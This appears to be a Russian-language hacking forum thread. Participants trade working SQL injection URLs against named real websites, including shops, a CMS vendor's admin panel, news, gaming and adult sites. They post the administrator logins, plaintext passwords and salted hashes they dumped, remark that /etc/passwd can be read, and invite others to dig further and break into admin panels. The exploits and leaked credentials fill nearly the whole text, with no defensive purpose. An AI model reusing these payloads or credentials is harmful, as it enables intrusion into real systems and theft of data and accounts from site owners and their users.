http://www.bridesathotbobbins.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password,0x3a3a)+from+accounts/* login:admin password:stolave22 Админим.....
Иногда из-за идиотизма одного страдают многие....... Не успел запостить http://www.bridesathotbobbins.co.uk/ Как, совершенно ненароком, мой взор пал на маааханькую приписочку снизу... А именнно Powered by Qwicsite Pro Да,да дружок! Именно там где мы логинимся вместо нерадивого админа. Зайдя на сайт этой чудной смски, я с удивлением обнаружил что баг то не местного разлива, а именно роднной баг СМС и исправлть его никто нигде не брался!!! http://www.qwic.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/* Login:admin Pass:stolave22 Там есть подраздельчик Qwicsite Pro websites admin, заходим туда и админим сразу всех их клиентов!!! А их не много не мало - 54 штуки!!!!
http://www.farmnet.eu/wcr/index.php?page=news/detail&newsID=11+and+1=2+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/* user() = eu-info@localhost version() = 5.0.27 database() = db02 http://www.farmnet.eu/wcr/index.php?page=log-in wcr-team:maize
http://www.hotels-piter.spb.ru/pages_piter.php?idleft=-4+union+select+concat(login,7,password)+from+users Только ХЗ от чего пароль, к админке не подходит ! Ну может кому интерестно пороет найдет, если найдете отпишитесь, любопытно !
http://msracing.co.uk/category.php?c_id=1)+union+select+1,2,concat(0x3a3a,u_username,0x3a3a,u_password),4+from+users/* http://msracing.co.uk/admin/ login:msrcng06 pass:msrcng2006
http://www.breitbart.com/print.php?id=D8QRMCU00%27+union+select+1,2,3,4,5,6,7,8,9,0,version(),2/* 4.1.20-log
Заметьте, проект САМЫЙ крупный который посвящён серии GTA http://gta.com.ua/file_sa_details.phtml?id=59'
Раскрутил бы до конца что ли... http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/* Версия: 4. Login:admin Password hash:2IsfJILPkOJ2 (DES??) http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.
http://www.fbmbmx.com/news.php?newsid=1296+and+1=2+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* user() = fbmbmx@localhost version() = 4.1.21-log database() = fbmbmx admins nameassword mike:erb9768 john:lee7124 steve:crandall4776 tom:blyth24 mikefixed:erb9768
Вот инъект на порносайте, интересно конечно в админку было бы влезть, но соленый хэш И не известно как соленый, да еще соль похоже хэшированая, а где чистая соль лежит не нашел еще ! http://novoporn.com/index.php?action=image&id=-16323+union+select+1,concat(id,char(58,58,58),loginname,char(58,58,58),password,char(58,58,58),salt,char(58,58,58),title,char(58,58,58),firstname,char(58,58,58),lastname,char(58,58,58),email,char(58,58,58),inactive),3+from+cfw_auth_login name::ass:::salt admin:::32d22edc834dbe06bef10ffb7cb148e1:::b7f4cf829896e1ccbfbc63c934077c6c
Китайский банннер-эксчендж login:mintruder pass:django1' http://www.banner4banner.ch/view.php?e=1&t=_blank&c=i&b=-1+union+select+1,2,concat(username,0x3a3a,password),4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,20/* в 0 лимите лежит админ, но не брутится сволота... =)
-1+union+select+111,222,333,table_schema,555,666+from+information_schema.tables+where+table_name=0x7573657273
Code: http://www.nofollow.ru/?page=articles&artcat=23&artid=1955+union+select+1,2,concat(username,0x3a3a,password),3,5,6+from+user/* Админка: http://www.nofollow.ru/_admin_ Но видимо там .htpassword или как там его
Code: http://bukvoed.ru/index.php?page=freec&act=reada&qid=4386+and+4386=-1+union+select+1,2,3,concat(fio,0x3a,email,0x3a,pwd),5+from+be_users/* фио-мыло-пасс странная у них система юзеров :/
Code: http://www.asud.net/Iniziative/iniziativa.php?in=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
Подсобите в админку попасть ? http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,id,name,password,status),9,10,11,12,13+from+_2.main_users-- Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог, разрешена запись, но не найти директорию. Есть пароли но ХЗ где админка ! такая вот тема
Там может и не быть админки конкретно у этого сайта. Я так понимаю что база к которой он привязан общается еще с десятком сайтов. Или же просто криворукий одмин навставлял 10000000 движков таблиц и всякой такой хрени, потому как там оч много баз и таблиц... Code: http://www.emirate.ru/subscribe.php?&sub=-25+uni on+selec t+1,table_name,3+from+information_schema.tables/* - Это для таблиц http://www.emirate.ru/subscribe.php?&sub=-25+uni on+sele ct+1,table_schema,3+from+information_schema.tables/* - Это для имен Баз Вот те линк на таблицы, дальше раскручивай сам, если есть желание. Там даж вордпресс стоит =) Code: http://www.emirate.ru/subscribe.php?&s ub=-25+union+select+1,option_na me,option_value+from+wordpress.wp_options/* _http://smart-journeys.com Кароч если подрочить, можешь много всякого там накрутить))) Удачи. Если че интересного найдешь отпишись. Интересно. а самому ковырять времени нету)
